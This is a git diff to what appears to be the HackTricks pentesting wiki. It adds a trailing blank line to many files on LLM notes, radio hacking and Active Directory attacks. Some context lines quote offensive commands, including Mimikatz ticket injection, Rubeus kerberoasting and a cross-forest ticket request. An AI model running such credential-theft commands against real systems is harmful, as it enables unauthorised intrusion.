+++ b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
@@ -299,3 +299,4 @@ During the backward pass:
 - **Ease of Use:** Eliminates manual computation of derivatives.
 
 
+
diff --git a/src/todo/llm-training-data-preparation/1.-tokenizing.md b/src/todo/llm-training-data-preparation/1.-tokenizing.md
index 0b126a672..6a8c8eaf9 100644
--- a/src/todo/llm-training-data-preparation/1.-tokenizing.md
+++ b/src/todo/llm-training-data-preparation/1.-tokenizing.md
@@ -97,3 +97,4 @@ print(token_ids[:50])
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 
 
+
diff --git a/src/todo/llm-training-data-preparation/2.-data-sampling.md b/src/todo/llm-training-data-preparation/2.-data-sampling.md
index 695f072ee..b46e59081 100644
--- a/src/todo/llm-training-data-preparation/2.-data-sampling.md
+++ b/src/todo/llm-training-data-preparation/2.-data-sampling.md
@@ -239,3 +239,4 @@ tensor([[  367,  2885,  1464,  1807],
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 
 
+
diff --git a/src/todo/llm-training-data-preparation/3.-token-embeddings.md b/src/todo/llm-training-data-preparation/3.-token-embeddings.md
index a0f9514be..a5a5d3a99 100644
--- a/src/todo/llm-training-data-preparation/3.-token-embeddings.md
+++ b/src/todo/llm-training-data-preparation/3.-token-embeddings.md
@@ -217,3 +217,4 @@ print(input_embeddings.shape) # torch.Size([8, 4, 256])
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 
 
+
diff --git a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
index 88c96386d..0e58c52d7 100644
--- a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
+++ b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
@@ -428,3 +428,4 @@ For another compact and efficient implementation you could use the [`torch.nn.Mu
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 
 
+
diff --git a/src/todo/llm-training-data-preparation/5.-llm-architecture.md b/src/todo/llm-training-data-preparation/5.-llm-architecture.md
index 1e86eaff4..267e68a6c 100644
--- a/src/todo/llm-training-data-preparation/5.-llm-architecture.md
+++ b/src/todo/llm-training-data-preparation/5.-llm-architecture.md
@@ -700,3 +700,4 @@ print("Output length:", len(out[0]))
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 
 
+
diff --git a/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md b/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md
index b493e9798..ac8b12b36 100644
--- a/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md
+++ b/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md
@@ -969,3 +969,4 @@ There 2 quick scripts to load the GPT2 weights locally. For both you can clone t
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 
 
+
diff --git a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
index b30cace1c..b76241766 100644
--- a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
+++ b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
@@ -63,3 +63,4 @@ def replace_linear_with_lora(model, rank, alpha):
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 
 
+
diff --git a/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md b/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md
index dbab34b80..af38e8c8f 100644
--- a/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md
+++ b/src/todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md
@@ -116,3 +116,4 @@ You can find all the code to fine-tune GPT2 to be a spam classifier in [https://
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 
 
+
diff --git a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
index 05e138b75..edf523301 100644
--- a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
+++ b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
@@ -106,3 +106,4 @@ You can find an example of the code to perform this fine tuning in [https://gith
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 
 
+
diff --git a/src/todo/llm-training-data-preparation/README.md b/src/todo/llm-training-data-preparation/README.md
index 7a381e315..515c506e2 100644
--- a/src/todo/llm-training-data-preparation/README.md
+++ b/src/todo/llm-training-data-preparation/README.md
@@ -98,3 +98,4 @@ You should start by reading this post for some basic concepts you should know ab
 {{#endref}}
 
 
+
diff --git a/src/todo/misc.md b/src/todo/misc.md
index 8b4e89443..c2bdbee52 100644
--- a/src/todo/misc.md
+++ b/src/todo/misc.md
@@ -60,3 +60,4 @@ Snow --> Hide messages using spaces and tabs
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/more-tools.md b/src/todo/more-tools.md
index 23884e57f..9e13a3f70 100644
--- a/src/todo/more-tools.md
+++ b/src/todo/more-tools.md
@@ -120,3 +120,4 @@ Firmware emulation: FIRMADYNE (https://github.com/firmadyne/firmadyne/) is a pla
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/online-platforms-with-api.md b/src/todo/online-platforms-with-api.md
index 7ada55681..a019992c2 100644
--- a/src/todo/online-platforms-with-api.md
+++ b/src/todo/online-platforms-with-api.md
@@ -127,3 +127,4 @@ It detects IP geolocation, data center, ASN and even VPN information. It offers
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/other-web-tricks.md b/src/todo/other-web-tricks.md
index f275f5851..c2dfe55bc 100644
--- a/src/todo/other-web-tricks.md
+++ b/src/todo/other-web-tricks.md
@@ -35,3 +35,4 @@ Developers might forget to disable various debugging options in the production e
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/pentesting-dns.md b/src/todo/pentesting-dns.md
index 816c7a6d3..b8527a78f 100644
--- a/src/todo/pentesting-dns.md
+++ b/src/todo/pentesting-dns.md
@@ -9,3 +9,4 @@
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/post-exploitation.md b/src/todo/post-exploitation.md
index c7385b0c9..9fee7c27c 100644
--- a/src/todo/post-exploitation.md
+++ b/src/todo/post-exploitation.md
@@ -16,3 +16,4 @@
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/README.md b/src/todo/radio-hacking/README.md
index 8f95deb47..690b761df 100644
--- a/src/todo/radio-hacking/README.md
+++ b/src/todo/radio-hacking/README.md
@@ -3,3 +3,4 @@
 
 
 
+
diff --git a/src/todo/radio-hacking/fissure-the-rf-framework.md b/src/todo/radio-hacking/fissure-the-rf-framework.md
index 90210ab19..896c59689 100644
--- a/src/todo/radio-hacking/fissure-the-rf-framework.md
+++ b/src/todo/radio-hacking/fissure-the-rf-framework.md
@@ -185,3 +185,4 @@ Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions
 
 
 
+
diff --git a/src/todo/radio-hacking/flipper-zero/README.md b/src/todo/radio-hacking/flipper-zero/README.md
index ef20a6fea..588ff7389 100644
--- a/src/todo/radio-hacking/flipper-zero/README.md
+++ b/src/todo/radio-hacking/flipper-zero/README.md
@@ -18,3 +18,4 @@ With [**Flipper Zero**](https://flipperzero.one/) you can:
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md b/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
index 946dc8b8a..c7af1f509 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-125khz-rfid.md
@@ -55,3 +55,4 @@ After **copying** a card or **entering** the ID **manually** it's possible to **
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/flipper-zero/fz-ibutton.md b/src/todo/radio-hacking/flipper-zero/fz-ibutton.md
index 9fbd28475..41896b55f 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-ibutton.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-ibutton.md
@@ -42,3 +42,4 @@ It's possible to **emulate** saved iButtons (read or manually added).
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/flipper-zero/fz-infrared.md b/src/todo/radio-hacking/flipper-zero/fz-infrared.md
index 6534f163b..3cf8ae3a4 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-infrared.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-infrared.md
@@ -40,3 +40,4 @@ If it doesn't, Flipper can **store** the **signal** and will allow you to **repl
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/flipper-zero/fz-nfc.md b/src/todo/radio-hacking/flipper-zero/fz-nfc.md
index 3e6a68ea0..09b85d577 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-nfc.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-nfc.md
@@ -79,3 +79,4 @@ However, you **can't read the CVV this way** (the 3 digits on the back of the ca
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
index 215b291d8..ed4dc488b 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
@@ -104,3 +104,4 @@ Check the list in [https://docs.flipperzero.one/sub-ghz/frequencies](https://doc
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/ibutton.md b/src/todo/radio-hacking/ibutton.md
index 4598898c6..bc979f03a 100644
--- a/src/todo/radio-hacking/ibutton.md
+++ b/src/todo/radio-hacking/ibutton.md
@@ -45,3 +45,4 @@ flipper-zero/fz-ibutton.md
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/infrared.md b/src/todo/radio-hacking/infrared.md
index 0fd7aec42..82fd9a9f4 100644
--- a/src/todo/radio-hacking/infrared.md
+++ b/src/todo/radio-hacking/infrared.md
@@ -81,3 +81,4 @@ flipper-zero/fz-infrared.md
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/low-power-wide-area-network.md b/src/todo/radio-hacking/low-power-wide-area-network.md
index 1051ef019..5dd51512d 100644
--- a/src/todo/radio-hacking/low-power-wide-area-network.md
+++ b/src/todo/radio-hacking/low-power-wide-area-network.md
@@ -16,3 +16,4 @@ Long Range (**LoRa**) it’s popular in multiple countries and has an open sourc
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
index 5efb22b22..295e02aee 100644
--- a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
+++ b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md
@@ -73,3 +73,4 @@ sudo bettercap --eval "ble.recon on"
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/pentesting-rfid.md b/src/todo/radio-hacking/pentesting-rfid.md
index 13e0b40f6..ce3430754 100644
--- a/src/todo/radio-hacking/pentesting-rfid.md
+++ b/src/todo/radio-hacking/pentesting-rfid.md
@@ -99,3 +99,4 @@ proxmark-3.md
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/proxmark-3.md b/src/todo/radio-hacking/proxmark-3.md
index ac97439a8..ad968cfe2 100644
--- a/src/todo/radio-hacking/proxmark-3.md
+++ b/src/todo/radio-hacking/proxmark-3.md
@@ -64,3 +64,4 @@ You can create a script to **fuzz tag readers**, so copying the data of a **vali
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/radio-hacking/sub-ghz-rf.md b/src/todo/radio-hacking/sub-ghz-rf.md
index 2c256ae0e..a00e4297b 100644
--- a/src/todo/radio-hacking/sub-ghz-rf.md
+++ b/src/todo/radio-hacking/sub-ghz-rf.md
@@ -87,3 +87,4 @@ Testing against an aftermarket rolling code system installed on a car, **sending
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/references.md b/src/todo/references.md
index 554fdab52..7b4e414f8 100644
--- a/src/todo/references.md
+++ b/src/todo/references.md
@@ -49,3 +49,4 @@
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/rust-basics.md b/src/todo/rust-basics.md
index c85552ae1..2a6cd891b 100644
--- a/src/todo/rust-basics.md
+++ b/src/todo/rust-basics.md
@@ -319,3 +319,4 @@ fn main() {
 
 
 
+
diff --git a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
index 2abdec480..c98b41c17 100644
--- a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
+++ b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
@@ -13,3 +13,4 @@ Here I present you the main ways to can try to achieve it:
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/test-llms.md b/src/todo/test-llms.md
index e9eb3e6fa..78f38b18f 100644
--- a/src/todo/test-llms.md
+++ b/src/todo/test-llms.md
@@ -51,3 +51,4 @@ It offers several sections like:
 
 
 
+
diff --git a/src/todo/tr-069.md b/src/todo/tr-069.md
index a8379e36e..46b3c31de 100644
--- a/src/todo/tr-069.md
+++ b/src/todo/tr-069.md
@@ -3,3 +3,4 @@
 
 
 
+
diff --git a/src/welcome/about-the-author.md b/src/welcome/about-the-author.md
index ace23bba7..b9a7c437f 100644
--- a/src/welcome/about-the-author.md
+++ b/src/welcome/about-the-author.md
@@ -13,3 +13,4 @@ HackTricks is also a wiki were **a lot of researches also share their latest fin
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md
index 5ef81c7b8..dc48dd373 100644
--- a/src/welcome/hacktricks-values-and-faq.md
+++ b/src/welcome/hacktricks-values-and-faq.md
@@ -145,3 +145,4 @@ This license does not grant any trademark or branding rights in relation to the
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md
index 92d184d42..6411fe2fe 100644
--- a/src/windows-hardening/active-directory-methodology/README.md
+++ b/src/windows-hardening/active-directory-methodology/README.md
@@ -723,3 +723,4 @@ rdp-sessions-abuse.md
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
index 467ae731b..f83e1ecb9 100644
--- a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
+++ b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
@@ -288,3 +288,4 @@ A strategy that many authors have come up with is to force a SYSTEM service to a
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
index 0bf686666..0eb3cd7fc 100644
--- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
+++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md
@@ -202,3 +202,4 @@ Furthermore, additional methods for executing code or maintaining persistence, s
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
index 64ef33b89..f9d1b881c 100644
--- a/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
+++ b/src/windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md
@@ -67,3 +67,4 @@ ShadowSpray aims to **exploit GenericWrite/GenericAll permissions that wide user
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates.md b/src/windows-hardening/active-directory-methodology/ad-certificates.md
index b4b2a991b..e78fd7a8c 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates.md
@@ -129,3 +129,4 @@ certutil -v -dstemplate
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/README.md b/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
index ede4e23cb..18a6b64a1 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
@@ -129,3 +129,4 @@ certutil -v -dstemplate
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md b/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
index 0f68fef52..8c7d07cf1 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
@@ -55,3 +55,4 @@ This approach allows for an **extended persistence** method, minimizing the risk
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md b/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
index da2621a3b..4a24e738e 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
@@ -117,3 +117,4 @@ This explanation encapsulates the process and tools involved in NTLM credential
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
index f9655eee4..c335d8b40 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
@@ -737,3 +737,4 @@ Both scenarios lead to an **increase in the attack surface** from one forest to
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
index 9925066ab..b81659be9 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
@@ -67,3 +67,4 @@ An example of malicious implementation would involve an attacker, who has **elev
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-dns-records.md b/src/windows-hardening/active-directory-methodology/ad-dns-records.md
index ab59ea5b0..a1f51ebe4 100644
--- a/src/windows-hardening/active-directory-methodology/ad-dns-records.md
+++ b/src/windows-hardening/active-directory-methodology/ad-dns-records.md
@@ -20,3 +20,4 @@ For more information read [https://dirkjanm.io/getting-in-the-zone-dumping-activ
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
index 87a193d50..da5d84b04 100644
--- a/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
+++ b/src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
@@ -56,3 +56,4 @@ slapd -d 2
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/asreproast.md b/src/windows-hardening/active-directory-methodology/asreproast.md
index 92e739ff7..9ba53840c 100644
--- a/src/windows-hardening/active-directory-methodology/asreproast.md
+++ b/src/windows-hardening/active-directory-methodology/asreproast.md
@@ -83,3 +83,4 @@ ASRepCatcher listen
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/bloodhound.md b/src/windows-hardening/active-directory-methodology/bloodhound.md
index bcb873aa3..042fa9843 100644
--- a/src/windows-hardening/active-directory-methodology/bloodhound.md
+++ b/src/windows-hardening/active-directory-methodology/bloodhound.md
@@ -97,3 +97,4 @@ To run it, can execute the binary `PingCastle.exe` and it will start an **intera
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/constrained-delegation.md b/src/windows-hardening/active-directory-methodology/constrained-delegation.md
index 5062f036c..4bc4b3f6e 100644
--- a/src/windows-hardening/active-directory-methodology/constrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/constrained-delegation.md
@@ -83,3 +83,4 @@ Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/custom-ssp.md b/src/windows-hardening/active-directory-methodology/custom-ssp.md
index f26fcb2bf..04bfcafa2 100644
--- a/src/windows-hardening/active-directory-methodology/custom-ssp.md
+++ b/src/windows-hardening/active-directory-methodology/custom-ssp.md
@@ -46,3 +46,4 @@ Event ID 4657 - Audit creation/change of `HKLM:\System\CurrentControlSet\Control
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/dcshadow.md b/src/windows-hardening/active-directory-methodology/dcshadow.md
index 1d8be7221..2291069dc 100644
--- a/src/windows-hardening/active-directory-methodology/dcshadow.md
+++ b/src/windows-hardening/active-directory-methodology/dcshadow.md
@@ -74,3 +74,4 @@ Notice that in this case you need to make **several changes,** not just one. So,
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/dcsync.md b/src/windows-hardening/active-directory-methodology/dcsync.md
index d81d62eb0..59f936117 100644
--- a/src/windows-hardening/active-directory-methodology/dcsync.md
+++ b/src/windows-hardening/active-directory-methodology/dcsync.md
@@ -74,3 +74,4 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/diamond-ticket.md b/src/windows-hardening/active-directory-methodology/diamond-ticket.md
index 9033c284d..1b95877c7 100644
--- a/src/windows-hardening/active-directory-methodology/diamond-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/diamond-ticket.md
@@ -32,3 +32,4 @@ powershell Get-DomainUser -Identity <username> -Properties objectsid
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
index 08a86a3b3..f9f38abe2 100644
--- a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
+++ b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
@@ -34,3 +34,4 @@ More info about this in: [https://adsecurity.org/?p=1714](https://adsecurity.org
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md b/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
index 63aa0f357..f6d83fbd6 100644
--- a/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
+++ b/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
@@ -83,3 +83,4 @@ The cleartext password can be used to perform regular authentication as the trus
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md b/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
index eae19a77e..dbaace7e6 100644
--- a/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
+++ b/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
@@ -129,3 +129,4 @@ Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /d
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/golden-ticket.md b/src/windows-hardening/active-directory-methodology/golden-ticket.md
index f6c5b2729..7884c7a16 100644
--- a/src/windows-hardening/active-directory-methodology/golden-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/golden-ticket.md
@@ -64,3 +64,4 @@ Other little tricks defenders can do is **alert on 4769's for sensitive users**
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/kerberoast.md b/src/windows-hardening/active-directory-methodology/kerberoast.md
index 7a65631be..01cced36c 100644
--- a/src/windows-hardening/active-directory-methodology/kerberoast.md
+++ b/src/windows-hardening/active-directory-methodology/kerberoast.md
@@ -173,3 +173,4 @@ Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"d
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/kerberos-authentication.md b/src/windows-hardening/active-directory-methodology/kerberos-authentication.md
index 609680253..ec26c2475 100644
--- a/src/windows-hardening/active-directory-methodology/kerberos-authentication.md
+++ b/src/windows-hardening/active-directory-methodology/kerberos-authentication.md
@@ -7,3 +7,4 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
index 4b8f52c7f..c0e2c511f 100644
--- a/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
+++ b/src/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
@@ -105,3 +105,4 @@ icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/laps.md b/src/windows-hardening/active-directory-methodology/laps.md
index 96d71e86d..4ff1b91a8 100644
--- a/src/windows-hardening/active-directory-methodology/laps.md
+++ b/src/windows-hardening/active-directory-methodology/laps.md
@@ -143,3 +143,4 @@ Then, just compile the new `AdmPwd.PS.dll` and upload it to the machine in `C:\T
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md b/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
index 871785b98..33089524e 100644
--- a/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
+++ b/src/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
@@ -44,3 +44,4 @@ To conform to operational security and use AES256, the following command can be
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/pass-the-ticket.md b/src/windows-hardening/active-directory-methodology/pass-the-ticket.md
index 90b709c42..4cbac2655 100644
--- a/src/windows-hardening/active-directory-methodology/pass-the-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/pass-the-ticket.md
@@ -47,3 +47,4 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/password-spraying.md b/src/windows-hardening/active-directory-methodology/password-spraying.md
index 25fe03a9c..d4be04cae 100644
--- a/src/windows-hardening/active-directory-methodology/password-spraying.md
+++ b/src/windows-hardening/active-directory-methodology/password-spraying.md
@@ -151,3 +151,4 @@ To use any of these tools, you need a user list and a password / a small list of
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
index 63f1f1b01..5aadead6b 100644
--- a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
+++ b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
@@ -130,3 +130,4 @@ If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlm
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/printnightmare.md b/src/windows-hardening/active-directory-methodology/printnightmare.md
index 702aaf80c..dbc693618 100644
--- a/src/windows-hardening/active-directory-methodology/printnightmare.md
+++ b/src/windows-hardening/active-directory-methodology/printnightmare.md
@@ -7,3 +7,4 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
index 9b947eca6..5a51be49e 100644
--- a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
+++ b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
